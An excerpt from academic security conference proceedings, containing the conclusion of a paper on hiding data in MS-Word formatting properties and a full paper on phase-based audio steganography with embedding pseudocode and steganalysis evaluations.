that can be embedded to 27. This could be changed by using
four or five similar font types, resulting in up to 64 and 125
different characters, respectively. But finding a bigger number of similar fonts
is very difficult, and in the end the user may notice the differences
in the font used for capital letters. An additional problem can arise
if a non-Latin alphabet is used and the selected font is not present
on the machine. For example, if Cyrillic letters are used and the
font is not present, the capital letters will be displayed as Latin,
and the coding will be visible to the human eye.

Figure 1. Detection of hiding with Methods 2 and 3 by changing the page
background color.
A. Robustness and Steganalysis
Some text steganography methods, like line-shift
coding, word-shift coding, and luminance modulation coding,
are robust to document printing and scanning but have low
embedding rates. Other methods, like open-space methods, have
higher embedding rates but are less robust, or not robust at all, against
document printing and scanning. Property Coding belongs to the
second group: it is not robust at all against document
printing and scanning. Property Coding is resistant to save
actions, compared to two of the methods presented in [35], and it also
has a smaller overhead compared to the other two methods from
[35].
Hidden text embedded with Property Coding can be changed or
destroyed by text editing. The presence of Methods 2, 3, and
4 can easily be detected if somebody intentionally changes
the background color of the document, causing the borders
and underlining to become visible (see Figure 1). Method 1 is
resistant to this kind of attack.
Property Coding is not entirely suitable for copyright
protection applications where robust data hiding is required,
because the attacker can always use Optical Character Recognition
(OCR) to completely remove the hidden data.
VI. CONCLUSION
Four new format-based methods specially designed for
hiding data in MS-Word documents have been presented. Because they
change the properties of some document objects offered by
MS-Word, we call this new type of method Property Coding.
These methods are resistant to saving actions, introduce a very
small overhead on the document size, and can embed up to 8
bits per character.
REFERENCES
[1] I. J. Cox, M. L. Miller, J. A. Bloom, J. Fridrich, and T. Kalker, Eds.,
Digital Watermarking and Steganography. Elsevier Inc., Burlington,
MA, 2008, ISBN: 978-0-12-372585-1.
[2] H. Singh, P. K. Singh, and K. Saroha, "A Survey on Text Based
Steganography," in Proceedings of the 3rd National Conference
INDIACom-2009, New Delhi, India, 2009, pp. 3–9.
[3] M. Agarwal, "Text Steganographic Approaches: A Comparison," International
Journal of Network Security & Its Applications, vol. 5 (1),
2013, pp. 91–106.
[4] M. J. Atallah et al., "Natural language watermarking: design, analysis,
and a proof-of-concept implementation," in Proceedings of the 4th
International Workshop on Information Hiding, April 25-27, 2001,
Pittsburgh, USA. Springer Berlin Heidelberg, Apr. 2001, pp. 185–200,
Moskowitz, I. S., Ed., LNCS: 2137, ISBN: 978-3-540-45496-0.
[5] M. Atallah et al., "Natural Language Watermarking and Tamperproofing,"
in Proceedings of the 5th International Workshop on Information
Hiding, October 7-9, 2002, Noordwijkerhout, Netherlands. Springer-Verlag
Berlin Heidelberg, Oct. 2003, pp. 196–212, Petitcolas, F. A. P.,
Ed., LNCS: 2578, ISBN: 3-540-00421-1.
[6] M. Topkara, C. M. Taskiran, and E. J. Delp, "Natural language watermarking,"
in Proceedings of the SPIE Electronic Imaging: Security,
Steganography, and Watermarking of Multimedia Contents VII,
vol. 5681, 2005, doi: 10.1117/12.593790.
[7] K. Bennett, "Linguistic steganography: Survey, analysis, and robustness
concerns for hiding information in text," CERIAS Tech Report
2004-13, 2004.
[8] S. H. Low, N. F. Maxemchuk, J. T. Brassil, and L. O'Gorman, "Document
marking and identification using both line and word shifting,"
in Proceedings of the 14th Annual Joint Conference of the IEEE
Computer and Communications Societies (INFOCOM '95), April 2-6,
1995, Boston, Massachusetts, Apr. 1995, pp. 853–860.
[9] J. T. Brassil, S. Low, N. F. Maxemchuk, and L. O'Gorman, "Electronic
Marking and Identification Techniques to Discourage Document Copying,"
IEEE Journal on Selected Areas in Communications, vol. 13 (8),
1995, pp. 1495–1504.
[10] J. T. Brassil, S. Low, and N. F. Maxemchuk, "Copyright protection for
the electronic distribution of text documents," Proceedings of the IEEE,
vol. 87 (7), 1999, pp. 1181–1196.
[11] Y. Kim, K. Moon, and I. Oh, "A Text Watermarking Algorithm based
on Word Classification and Interword Space Statistics," in Proceedings
of the 7th International Conference on Document Analysis and Recognition
(ICDAR '03), August 3-6, 2003, Edinburgh, Scotland. IEEE
Computer Society, Washington, DC, USA, Aug. 2003, pp. 775–779.
[12] M. Shirali-Shahreza and S. Shirali-Shahreza, "A New Approach to Persian/Arabic
Text Steganography," in Proceedings of the 5th IEEE/ACIS
International Conference on Computer and Information Science and 1st
IEEE/ACIS, July 2006, Honolulu, USA, Jul. 2006, pp. 310–315.
[13] M. Aabed, S. Awaideh, A.-R. Elshafei, and A. Gutub, "Arabic Diacritics
Based Steganography," in Proceedings of the IEEE International
Conference on Signal Processing and Communications (ICSPC 2007),
November 24-27, 2007, Dubai, UAE, Nov. 2007, pp. 756–759.
[14] A. A. Gutub, L. M. Ghouti, Y. S. Elarian, S. M. Awaideh, and A. K.
Alvi, "Utilizing Diacritic Marks for Arabic Text Steganography,"
Kuwait Journal of Science & Engineering, vol. 37 (1), 2010, pp. 1–16,
ISSN: 1024-8684.
[15] W. Bender, D. Gruhl, N. Morimoto, and A. Lu, "Techniques for data
hiding," IBM Systems Journal, vol. 35, 1996, pp. 313–336.
[16] A. M. Alattar and O. M. Alattar, “Watermarking electronic text documents containing justified paragraphs and irregular line spacing,” in
Proceedings of the SPIE - Security, Steganography, and Watermarking
of Multimedia Contents VI June, 2004, San Jose, California, USA.
Society of Photo Optical, Jun. 2004, pp. 685–695.
[17] M. Kwan, "The SNOW Home Page," 2006, URL:
http://www.darkside.com.au/snow/ [accessed: 2014-03-03].
[18] L. Y. Por and B. Delina, “Whitesteg: a new scheme in information
hiding using text steganography,” WSEAS Transaction on Computers,
vol. 7, 2008, pp. 735–745.
[19] L. Y. Por, K. Wong, and K. O. Chee, “UniSpaCh: A text-based data
hiding method using Unicode space characters,” The Journal of Systems
and Software, vol. 85, 2012, pp. 1075–1082.
[20] C. Chen, S. Z. Wang, and X. P. Zhang, “Information Hiding in Text
Using Typesetting Tools with Stego-Encoding,” in Proceedings of the
First International Conference on Innovative Computing, Information
and Control August 30 - September 1, 2006, Beijing, China, 2006, pp.
459–462.
[21] I.-C. Lin and P.-K. Hsu, “A Data Hiding Scheme on Word Documents using Multiple-base Notation System,” in Proceedings of the
6th International Conference on Intelligent Information Hiding and
Multimedia Signal Processing (IIH-MSP‘10) October 15-17, 2010,
Darmstadt, Germany, Oct. 2010, pp. 31–33.
[22] P. V. K. Borges and J. Mayer, “Document Watermarking via Character
Luminance Modulation,” in Proceedings of the IEEE International
Conference of Acoustics, Speech and Signal Processing (ICASSP 2006)
May 14–16, 2006, Toulouse, France, Jul. 2006, pp. II–317, ISBN: 1-4244-0469-X.
[23] A. K. Bhattacharjya and H. Ancin, “Data embedding in text for a copier
system,” in Proceedings of the IEEE International Conference on Image
Processing (ICIP 99) October 24-28, 1999, Kobe, Japan, Oct. 1999, pp.
245–249.
[24] R. Villán et al., “Text Data-Hiding for Digital and Printed Documents: Theoretical and Practical Considerations,” in Proceedings of
the SPIE Electronic Imaging: Security, Steganography, and Watermarking of Multimedia Contents VIII, 2006, vol. 6072, 2006, doi:
10.1117/12.641957.
[25] A. Gutub and M. Fattani, “A Novel Arabic Text Steganography Method
Using Letter Points and Extensions,” in Proceedings of the WASET International Conference on Computer, Information and Systems Science
and Engineering (ICCISSE), vol. 21 May, 2007, Vienna, Austria, May
2007, pp. 28–31.
[26] P. Wayner, Disappearing Cryptography: Information Hiding: Steganography
& Watermarking, 3rd edition. Elsevier Inc., 2009, ISBN: 978-0-12-374479-1.
[27] B. Murphy and C. Vogel, “The syntax of concealment: reliable methods
for plain text information hiding,” in Proceedings of the SPIE International Conference on Security, Steganography, and Watermarking of
Multimedia Contents 2007, vol. 6505, 2007, doi: 10.1117/12.713357.
[28] H. Nakagawa, T. Matsumoto, and I. Murase, "Information
Hiding for Text by Paraphrasing," 2002, URL:
http://www.r.dl.itc.u-tokyo.ac.jp/~nakagawa/academic-res/finpri02.pdf
[accessed: 2014-03-03].
[29] M. Shirali-Shahreza, “Text Steganography by Changing Words
Spelling,” in Proceedings of the 10th International Conference on
Advanced Communication Technology (ICACT 2008) February, 2008,
Kitakyushu, Japan, vol. 3, Feb. 2008, pp. 1912–1913.
[30] M. Niimi, S. Minewaki, H. Noda, and E. Kawaguchi, “A Framework
for a Simple Sentence Paraphrase Using Concept Hieararchy in SDForm Semantics Model,” in Proceedings of the 13th European-Japanese
Conference on Information Modelling and Knowledge Bases (EJC
2003), June 3-6, Kitakyushu, Japan. IOS Press, 2004, pp. 55–66.
[31] M. Topkara, U. Taskiran, and M. J. Atallah, “Information Hiding
Through Errors: A Confusing Approach,” in Proceedings of the SPIE
Electronic Imaging: Security, Steganography, and Watermarking of
Multimedia Contents 2007, vol. 6505, 2007, doi: 10.1117/12.706980.
[32] M. Khairullah, “A Novel Text Steganography System Using Font
Color of the Invisible Characters in Microsoft Word Documents,” in
Proceedings of the Second International Conference on Computer and
Electrical Engineering (ICCEE ’09) December, 2009, Dubai, Dec. 2009,
pp. 482–484, ISBN: 978-0-7695-3925-6.
[33] W. Bhaya, A. M. Rahma, and D. Al-Nasrawi, "Text Steganography
based on Font Type in MS-Word Documents," Journal of Computer
Science, vol. 9 (7), 2013, pp. 898–904, ISSN: 1549-3636.
[34] T.-Y. Liu and W.-H. Tsai, "A New Steganographic Method for Data
Hiding in Microsoft Word Documents by a Change Tracking Technique,"
IEEE Transactions on Information Forensics and Security, vol.
2 (1), 2007, pp. 24–30.
[35] A. Castiglione, B. D'Alessio, A. De Santis, and F. Palmieri, "New
steganographic techniques for the OOXML file format," in Proceedings
of the IFIP WG 8.4/8.9 International Cross Domain Conference on
Availability, Reliability and Security for Business, Enterprise and Health
Information Systems, August 22-26, 2011, Vienna, Austria. Springer,
Aug. 2011, pp. 344–358, Tjoa, A. M., Quirchmayr, G., You, I., Xu, L.,
Eds., LNCS: 6908, ISBN: 978-3-642-23299-2.
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Audio Steganography by Phase Modification

Fatiha Djebbar
UAE University
College of Information Technology
Al Ain, UAE
Email: fdjebbar@uaeu.ac.ae

Beghdad Ayad
University of Wollongong in Dubai
Faculty of Engineering and Information Science
Dubai, UAE
Email: beghdadayad@uowdubai.ac.ae
Abstract—In this paper, we propose a robust steganographic
system that embeds high-capacity data in the phase spectrum. Our
approach is based on the assumption that partial alteration of
selected frequency bins in the phase spectrum leads to a smooth
transition while preserving phase continuity. The frequency bins,
in the phase, selected for data hiding are first defined in the
magnitude through an election process and then mapped into the
phase spectrum to embed data. Perceptual and statistical study
results demonstrate that, in comparison with a recently proposed
magnitude based audio steganography method, the phase based
approach gains a considerable advantage against steganalysis
attacks while giving similar or comparable hiding capacity and
audio quality.
Keywords–Information hiding; Phase Coding; Steganalysis.
I. INTRODUCTION
Digital audio steganography has emerged as a prominent means of data hiding across novel telecommunication
technologies such as voice-over-IP and audio conferencing.
Currently, three main methods are being used: cryptography,
watermarking, and steganography. Encryption techniques are
based on rendering the content of a message garbled to
unauthorized people. In watermarking, data is hidden to convey
some information about the cover medium, such as ownership
and copyright, and the hidden message can be visible
or invisible. The primary goal of steganography is to
undetectably modify a multimedia file in order to embed data
[1]. While steganography is about concealing the existence of
a hidden message, steganalysis is about detecting that existence
[2]. Steganalysis, the counterpart of steganography, can be regarded
as "attacks" aiming to break steganography algorithms by means of
different audio processing and statistical analysis approaches.
Steganography in today’s computer era is considered a
sub-discipline of the data communication security domain.
Lately, new directions based on steganographic approaches
started to emerge to ensure data secrecy. Modern techniques of
steganography exploit the characteristics of digital media by
utilizing them as a carrier (cover) to hold hidden information.
Covers can be of different types including image [4], audio
[5], video [6], text [7], and IP datagram [8].
Several methods of audio data hiding have been proposed,
whether in the time or frequency domain, including low-bit coding,
spread spectrum coding, phase coding, echo data hiding,
etc. [1]. To hide information within audio signals, the authors of
[9][10] designed a steganographic algorithm that manipulates the higher
LSB layers of the audio signal. Phase alteration and spread
spectrum are used in [11][12]; wavelet coding is used in
[13][14]; and magnitude-based data hiding was proposed in
[15]. Most of these methods take the information-hiding ratio as
a major factor in evaluating the robustness of their algorithms.
As is generally expected, a higher information-hiding ratio
elevates the risk of detecting the presence of hidden data.
In this paper, we present a robust phase coding technique
for digital audio steganography. The original contributions of
the paper mainly address the undetectability issue of hidden
data encountered in our previous work, where the magnitude
spectrum alone was considered [15]. The phase spectrum is explored, in
particular, to benefit from the inherent advantages of phase
data hiding, as it is commonly understood that, when phase
coding can be used, it gives a better signal-to-noise ratio [1].
Our work is supported by a thorough comparative study by
steganalysis to judge the performance of our steganographic algorithm.
The comparison is performed against our previously presented
algorithm [15] and existing high-capacity LSB-based audio
steganographic software: Steghide, S-Tools, and Hide4PGP,
found respectively in [16]–[18]. The perceptual evaluation as well
as the steganalysis study show that the resulting stego stream
preserves the naturalness of the original signal and resists
steganalysis attacks while achieving a hiding capacity similar
or comparable to that in [15].
The rest of the paper is organized as follows. Motivation and
background are given in Section II. The phase hiding algorithm
is presented in Section III. Section IV describes
the steps developed to recover the embedded message at the
receiver's end. Section V presents the simulation experiments
and the subsequent evaluation results. Finally, we conclude the
paper with a summary of our work and some future directions
in Section VI.

II. MOTIVATION AND BACKGROUND
The particular importance of hiding data in audio files
results from the prevailing presence of the audio signal as an
information vector in our human society. Data hiding in audio
files is especially challenging because of the sensitivity of the
Human Auditory System (HAS): alterations of an audio signal
for data embedding purposes may affect the quality of that
signal. However, data hiding in the frequency domain rather
than the time domain tends to provide better results in
terms of signal-to-noise ratio [10]. In addition, human auditory
perception has certain particularities that can be exploited for
hiding data efficiently. For example, our ability to resolve tones
decreases as the frequency of the tone increases. Thus, it is
more effective to hide data in the higher frequency regions
than in the low frequencies [19].
In audio signals sampled at 16 kHz and quantized at 16
bits, frequencies within the range of 50 Hz to 7 kHz are
eligible for embedding data. The cover audio is divided into M
equal-length frames. For a sampling frequency of 16 kHz, a
4 ms frame, for example, produces 64 samples. The resolution
of each frequency component is equal to 16000/64 = 250 Hz.
Thus, the first frequency component that can be used for
hiding data is 250 Hz instead of 50 Hz (the starting
frequency of wide-band speech). If we take the Fourier
symmetry of the spectrum into account, the number of normalized
frequencies, i.e., the number of locations to hide data within
each frame, runs from FHDmin = 1 to FHDmax = 28
in the [0.25, 7] kHz frequency band. In each selected energetic
frequency-component location, at least one bit of the payload
is embedded.
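The frame arithmetic above can be checked in a few lines (parameters as stated in the text: 16 kHz sampling, 4 ms frames, usable band [0.25, 7] kHz):

```python
# Reproducing the capacity arithmetic: samples per frame, bin resolution,
# and the usable hiding-band indices FHDmin..FHDmax.
FS, FRAME_MS = 16_000, 4
N = FS * FRAME_MS // 1000          # samples per frame
RESOLUTION = FS / N                # Hz per frequency bin
FHD_MIN = 1                        # first usable bin (250 Hz)
FHD_MAX = int(7000 / RESOLUTION)   # last usable bin at or below 7 kHz
```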
for m = 1 to M do
    for n = 1 to N/2 do
        |φs(m, n)| ← |φc(m, n)|
    end for
    for k = FHDmin to FHDmax do
        if 10 · log10(|Sc(m, k)|) ≥ threshold_dB then
            if ∆(m, k)_dB ≥ CLSB_dB then
                |φs(m, k)| ← |φc(m, k)| + δ(m, k)
            end if
        end if
    end for
end for

Figure 1: Algorithm used to compute |φs(m, k)|
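The selection loop of Figure 1 can be transcribed almost literally into Python and run on one synthetic frame. The dB form of CLSB and the concrete increment δ(m, k) (a toy 1e-3 offset per payload bit here) are placeholders of ours, since the paper defines the actual bit injection only in Figure 3:

```python
# Literal sketch of the Figure 1 loop for a single frame; mag and phase are
# lists indexed by frequency bin, payload_bits is an iterable of 0/1 bits.
import math

def embed_frame(mag, phase, payload_bits, threshold_db=-20.0, clsb_db=5.0,
                fhd_min=1, fhd_max=28):
    stego = list(phase)                   # |phi_s| starts as a copy of |phi_c|
    bits = iter(payload_bits)
    for k in range(fhd_min, fhd_max + 1):
        energy_db = 10 * math.log10(mag[k])
        delta_db = energy_db - 13         # noise 13 dB below the signal is inaudible
        if energy_db >= threshold_db and delta_db >= clsb_db:
            try:
                stego[k] = phase[k] + next(bits) * 1e-3   # toy delta(m, k)
            except StopIteration:
                break                     # payload exhausted
    return stego
```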
III. PROPOSED HIDING ALGORITHM

In our scheme, the cover-signal is divided into M frames of
4 ms, each containing N samples sc(m, n), 1 ≤ m ≤ M and
1 ≤ n ≤ N. The magnitude spectrum |Sc(m, k)| is isolated
by transforming each frame to the frequency domain using the Fast
Fourier Transform (FFT): Sc(m, k) = FFT(sc(m, n)). The
hiding band is specified by FHDmin ≤ k ≤ FHDmax, where
FHDmin and FHDmax are the minimum and maximum
hiding band locations. In our algorithm, we only select
high-energy frequency components, in an attempt to minimize the
embedding distortion. A threshold value is set for that purpose:
a frequency bin is selected for data hiding only
if its energy is higher than or equal to the threshold. Data is
embedded from a chosen LSB layer (CLSB) up to ∆(m, k)dB,
where CLSB is the lower-limit LSB layer for hiding in a
frequency bin. In our experiments, CLSB is chosen to be
the 5th LSB layer at minimum. The ∆ value models the
upper limit for data hiding in a selected bin and is set
so as to impose a good quality on the stego-audio. The selection
process of frequency bins, done in the magnitude spectrum, as
well as the hiding locations, are summarized in Figure 2. The
details of the embedding process in a selected frequency bin
are described in Figure 3. The value of ∆(m, k)dB is set to
(|Sc(m, k)|)dB − 13 dB. In doing so, we benefit from the fact
that noise 13 dB below the original signal spectrum at
all frequencies is inaudible [20]. Even though the frequency
bins qualified for data hiding are selected in the magnitude
spectrum, we believe that we will also benefit from mapping
them to the phase spectrum, for the following reasons:
1) As we partially alter selected frequency bins, only a
   few bits in each selected frequency component are
   modified, which gives a smooth transition while
   preserving phase continuity.
2) When phase coding can be used, it gives a better
   signal-to-noise ratio [20].
3) Opportunities to increase hiding capacity are worth
   exploring.
To embed in the phase spectrum, we map the exact selected
frequency bins from the magnitude spectrum into the phase
spectrum φ(m, k), and data is likewise embedded from the CLSB layer
up to ∆(m, k)dB. Embedding data in the phase spectrum is described
as follows:
In Figure 1, the value of δ(m, k) represents the
modification of the phase value. A full description of
the phase modification induced by embedded bits in a given
frequency component is shown in Figure 3. The number
of injected bits in a frequency component depends on its
energy. In this manner, for the embedding in a given frequency
bin via |φs(m, k)| ← |φc(m, k)| + δ(m, k), the quantized phase
value is written in binary as

    |φc(m, k)| = an·2^n + an−1·2^(n−1) + an−2·2^(n−2) + ... + a2·2^2 + a1·2^1 + a0·2^0,

where ai ∈ {0, 1}, and the payload bits form δ(m, k) = di·2^i + di−1·2^(i−1) + ... + d0·2^0.
The stego-phase is then obtained by letting the payload bits di, ..., d0
overwrite the bit layers of |φc(m, k)| from the CLSB layer up to ∆(m, k),
while the bits above and below this range keep their cover values:

    |φs(m, k)| = an·2^n + an−1·2^(n−1) + ... + di·2^(c+i) + ... + d0·2^c + ac−1·2^(c−1) + ... + a0·2^0,

where c denotes the CLSB layer.
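One reading of this bit-level operation, on an integer-quantized phase value, is that the payload bits overwrite the layers from CLSB up to ∆ while every other layer keeps its cover value. A hedged sketch of that interpretation (the quantization of |φ| itself is not modeled here):

```python
# Overwrite the bit layers clsb..delta (inclusive) of an integer phase value
# with payload bits, and read them back; all other layers are untouched.
def replace_bits(phi_c, data_bits, clsb, delta):
    width = delta - clsb + 1
    mask = ((1 << width) - 1) << clsb
    return (phi_c & ~mask) | ((data_bits & ((1 << width) - 1)) << clsb)

def read_bits(phi_s, clsb, delta):
    width = delta - clsb + 1
    return (phi_s >> clsb) & ((1 << width) - 1)
```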
Finally, the new phase is combined with its magnitude to
produce the stego-spectrum: Ss(m, k) = |Sc(m, k)|·e^(jφs(m, k)).
The inverse transform (IFFT) is applied to the segment to get
the new stego-audio segment ss(m, n).

Figure 2: Spectral embedding area located in a frequency frame.
IV. HIDDEN DATA RETRIEVAL

Figure 3: Embedding process in a selected frequency bin.

To extract the hidden data from the phase spectrum, two
main steps are followed. First, we locate the bins used for
data embedding from the magnitude part |Ss(m, k)|. To do
so, the parameters determining the embedding locations in
each selected bin, such as Threshold, ∆(m, k), and CLSB, are
computed in the same way as done at the sender's end. Second,
we map the embedding locations found in the magnitude to
the phase spectrum. Segments of the secret data are extracted
and then reassembled as follows:
for m = 1 to M do
    for n = 1 to N/2 do
        |φs(m, n)| ← |φc(m, n)|
    end for
    for k = FHDmin to FHDmax do
        if 10 · log10(|Sc(m, k)|) ≥ threshold_dB then
            if ∆(m, k)_dB ≥ CLSB_dB then
                Extract δ(m, k) from |φs(m, k)|
            end if
        end if
    end for
end for

Figure 4: Algorithm used to extract δ(m, k)
V. PERFORMANCE EVALUATION

To evaluate the performance of the proposed algorithm,
we conducted a comparative study between stego- and cover-audio
signals. The study is based on (1) perceptual and (2)
steganalysis undetectability.

A. Perceptual undetectability

In this section, we assess the quality of the stego-audio
when the hiding capacity is maximized. Tests have been
conducted for the magnitude configuration [15] and the proposed
phase configuration. The Perceptual Evaluation of Speech Quality
(PESQ) measure defined in the ITU-T P.862.2 standard, combined with
the segmental SNR (SegSNR_dB), was utilized for the objective
evaluation [21]. The hiding rate (kbps) achieved is computed
accordingly. Tests are carried out on a set of 100 audio waves,
spoken in different languages by male and female speakers.
Audio signals are 10 s in length each and sampled at 16 kHz, and
data is embedded within the [0.25, 7] kHz band with a maximum
hiding ratio of 23 kbps.

The PESQ test produces a value ranging from 4.5 to 1. A
PESQ value of 4.5 means that the measured audio signal has
no distortion: it is exactly the same as the original. A value
of 1 indicates the severest degradation. The effectiveness of
our algorithm is evaluated on audio frames of 64 samples. We
set the algorithm parameters' values to maximize the hiding
capacity while maintaining audio quality, i.e., Threshold = −20 dB,
ρ = 15 dB, CLSB = 1, and FHDmin and FHDmax set
to 1 and 28 for a 4 ms frame length.

In our simulation, the distortion between stego- and cover-audio
signals is calculated over several frames, and by averaging the
statistics the overall measure is obtained. The SegSNR
value for one modified audio frame of 4 ms is given by the
following equation:

    SegSNR_dB = 10 · log10( Σ_{k=1}^{28} |Sc(m, k)|² / Σ_{k=1}^{28} |Sc(m, k) − Ss(m, k)|² )    (1)

The summation is performed on a per-frame basis. To evaluate
the results, the following criteria were used. First, the capability
of embedding a larger quantity of data (kbps) is sought while the
naturalness of the stego-audio is retained. Second, the hidden data
must be fully recovered from the stego audio-signal.

TABLE I: PERFORMANCE EVALUATION AND COMPARISON

    Hiding Method    SNR_dB    PESQ
    [15]             26.86     4.32
    Proposed         32.31     4.48

The values of SNR and PESQ registered in Table I are
obtained from frames of 4 ms, a hiding ratio of 23 kbps, and the 5th
LSB layer. They indicate clearly that stego-signals generated
by the proposed phase embedding approach experience
less distortion compared to [15]. Moreover, phase coding is
robust to common linear signal manipulations such as
amplification, attenuation, filtering, and resampling.
B. Comparative study by steganalysis
To further investigate the performance of our steganography
algorithm, a comparative study by steganalysis is conducted,
based on a state-of-the-art reference audio steganalysis method
[3]. The comparison is performed against our magnitude
data hiding [15] and existing audio steganographic software:
Steghide, S-Tools, and Hide4PGP, found respectively in [16]–[18].
The selected reference method has been applied successfully
in detecting the presence of hidden messages in high-capacity
LSB-based steganography algorithms [3]. It is based on
extracting Mel-cepstrum coefficients (features) from the
second-order derivative of audio signals. The features are then
fed to a support vector machine (SVM) with an RBF kernel [22]
to distinguish between cover- and stego-audio signals.
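The front end of that reference method starts from the second-order derivative of the signal; a minimal discrete sketch of just that first step (the Mel-cepstrum and SVM stages are omitted here):

```python
# Central second difference of a sampled signal, the first stage of the
# derivative-based steganalysis front end described in the text.
def second_derivative(x):
    """d[n] = x[n+1] - 2*x[n] + x[n-1], for interior samples."""
    return [x[n + 1] - 2 * x[n] + x[n - 1] for n in range(1, len(x) - 1)]
```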
For each studied steganography tool and algorithm, two
datasets are produced: training and testing. Each dataset contains 270 stego and cover WAV audio signals of 10 s length.
All signals are sampled at 44.1 kHz and quantized at 16 bits. Each training and testing dataset contains 135 positive
(stego) and 135 negative (cover) audio samples. We used online audio files of different types, such as speech signals in
different languages (e.g., English, Chinese, Japanese, French,
and Arabic) and music (classic, jazz, rock, blues).
All stego-audio signals are generated by hiding data of
different types: text, images, audio signals, video, and executable files. To make a fair comparison between all assessed
algorithms, the cover-signals were embedded with the same
capacity of data. More precisely, S-Tools' hiding capacity
(with a hiding ratio of 50%) is used as a reference for embedding with the
candidate steganographic algorithms and tools. The performance of each steganographic algorithm is measured by
the level at which the system can distinguish between stego-
and cover-audio signals (Table III). In order to analyze the
obtained results, we first present the contingency table (see
Table II).
The entries of the contingency table are described as follows:
• tp: stego-audio classified as stego-audio signal
• tn: cover-audio classified as cover-audio signal
• fn: stego-audio classified as cover-audio signal
• fp: cover-audio classified as stego-audio signal

TABLE II: THE CONTINGENCY TABLE

                 | Stego-signal         | Cover-signal
Stego classified | True positives (tp)  | False positives (fp)
Cover classified | False negatives (fn) | True negatives (tn)

In the subsequent formulas, all represents the total number of positive and negative audio signals. The values reported in Table II are used to calculate the following measure:

Accuracy(AC) = (tp + tn) / all    (2)

The receiver operating characteristic (ROC) curve plots the
fraction of true positives (TPR = true positive rate, equivalent
to sensitivity) versus the fraction of false positives (FPR =
false positive rate, equivalent to 1 - specificity). Following the
preparation of the training and testing datasets, we used the
SVM library tool available at [23] to discriminate between
cover- and stego-audio signals. The results of the comparative
study are reported in Table III. The accuracy of each studied
tool and method is measured by the values of AC and ROC.

In our second experimental work, we assess the performance of our algorithm and compare it to [15]–[18]. The values presented in Table III are the percentages
of stego-audio signals correctly classified. Higher score values
are interpreted as a high detection rate. Consequently, the proposed
method shows a significant improvement over the others,
whereby we were able to add considerable resistance to steganalysis
attacks to our steganographic algorithm. The fact that the phase
embedding scheme performed better than the other algorithms
shows that the distortion resulting from embedding at similar
embedding ratios is much smaller.

TABLE III: OVERALL ACCURACY STEGANALYSIS RESULTS
(AC per hiding method; the extracted values 0.575, 0.67, 0.725, 0.775, and 0.85 correspond to the proposed method, [15], Steghide, S-Tools, and Hide4PGP, but their exact column assignment was lost in extraction.)

Further details on the behavior of each algorithm are
represented in terms of ROC curves in Figure 5. In each graph, a
higher curve corresponds to a more accurate detection rate, while
a lower curve corresponds to a less accurate one.

Figure 5: ROC curves for steganographic methods [15]–[18] and the proposed
algorithm (true positive rate versus false positive rate).
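The contingency-table measures used in this comparison can be computed directly from the four counts; the counts below are illustrative only, not results from the paper:

```python
def contingency_measures(tp: int, tn: int, fp: int, fn: int) -> dict:
    """Measures derived from the contingency table of a steganalysis run."""
    all_ = tp + tn + fp + fn
    return {
        "accuracy": (tp + tn) / all_,   # equation (2): AC = (tp + tn) / all
        "tpr": tp / (tp + fn),          # sensitivity, y-axis of the ROC curve
        "fpr": fp / (fp + tn),          # 1 - specificity, x-axis of the ROC curve
    }

# Hypothetical outcome on a balanced set of 135 stego + 135 cover signals.
m = contingency_measures(tp=100, tn=110, fp=25, fn=35)
print(m)
```

An AC near 0.5 on a balanced dataset means the steganalyzer does no better than guessing, which is the desirable outcome for a steganographic scheme.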
For the second experiment, we further investigate the performance of our algorithm when the dataset contains only speech
or music signals. The aim of this experiment is to put more
emphasis on the behavior of the proposed algorithm when
music audio signals are used to convey hidden data versus
speech audio signals. We split the dataset into two
sets, A (130 speech signals) and B (130 music signals). Each
set is further split into 65 stego- and 65 cover-signals to create
training and testing datasets for speech as well as for music. A
setup similar to that described for experiment 1 was employed.
The overall results in Table IV and Figure 6 show that our
method performs better for both speech and music signals.
Our findings also show that data-hiding in music (Figure 6b)
is less detectable than in speech signals (Figure 6a). In fact,
the reference steganalysis method uses features extracted from
high frequencies (lower in energy), while our algorithm
targets high-energy frequency components to embed data. In
addition, the number of low-energy frequency components in
music audio signals is smaller than in speech signals.
TABLE IV: STEGANALYSIS RESULTS FOR DATA IN SPEECH AND IN
MUSIC AUDIO SIGNALS

Hiding methods | Audio signal | AC    | ROC
proposed       | Music        | 0.504 | 0.502
proposed       | Speech       | 0.558 | 0.558
[15]           | Music        | 0.6   | 0.598
[15]           | Speech       | 0.84  | 0.84

Figure 6: ROC curves for [15] and the proposed method for data-hiding in
speech (6a) versus music (6b) audio signals (true positive rate versus false positive rate).
VI. CONCLUSION
In this paper, we presented a robust phase-based audio steganography algorithm. This work has a double aim. The first is to
benefit from the fact that, when phase coding can be used, it
yields a better signal-to-noise ratio. The second is to address
the undetectability issue, which is overlooked by most of
the published work in audio steganography. Perceptual and
steganalysis study results reveal a great potential to hide large
amounts of data while ensuring their security and preserving
the naturalness of the original signals. In the future, we plan to
extend our work by investigating steganalysis of audio signals
in the codec domain.
REFERENCES
[1] F. Djebbar, B. Ayad, K. A. Meraim, and H. Hamam, "Comparative study of digital audio steganography techniques", EURASIP Journal on Audio, Speech, and Music Processing, Dec. 2012, pp. 1-16.
[2] Avcibas, "Audio steganalysis with content independent distortion measures", IEEE Signal Processing Letters, vol. 13, no. 2, 2006, pp. 92-95.
[3] Q. Liu, A. H. Sung, and M. Qiao, "Temporal derivative-based spectrum and mel-cepstrum audio steganalysis", IEEE Transactions on Information Forensics and Security, vol. 4, no. 3, 2009, pp. 359-368.
[4] A. Cheddad, J. Condell, K. Curran, and P. Mc Kevitt, "Digital image steganography: Survey and analysis of current methods", Signal Processing, vol. 90, issue 3, March 2010, pp. 727-752.
[5] F. Djebbar, K. Abed-Meraim, D. Guerchi, and H. Hamam, "Dynamic energy based text-in-speech spectrum hiding using speech masking properties", 2nd International Conference on Industrial Mechatronics and Automation (ICIMA), May 2010, vol. 2, pp. 422-426.
[6] R. Balaji and G. Naveen, "Secure data transmission using video steganography", IEEE International Conference on Electro/Information Technology (EIT), May 2011, pp. 1-5.
[7] M. Shirali-Shahreza and S. Shirali-Shahreza, "Persian/Arabic Unicode Text Steganography", Fourth International Conference on Information Assurance and Security (IAS), Sept. 2008, pp. 62-66.
[8] T. G. Handel and M. T. Sandford II, "Hiding Data in the OSI Network Model", Information Hiding: First International Workshop, Cambridge, UK, Lecture Notes in Computer Science, 1996, vol. 1174, pp. 23-38.
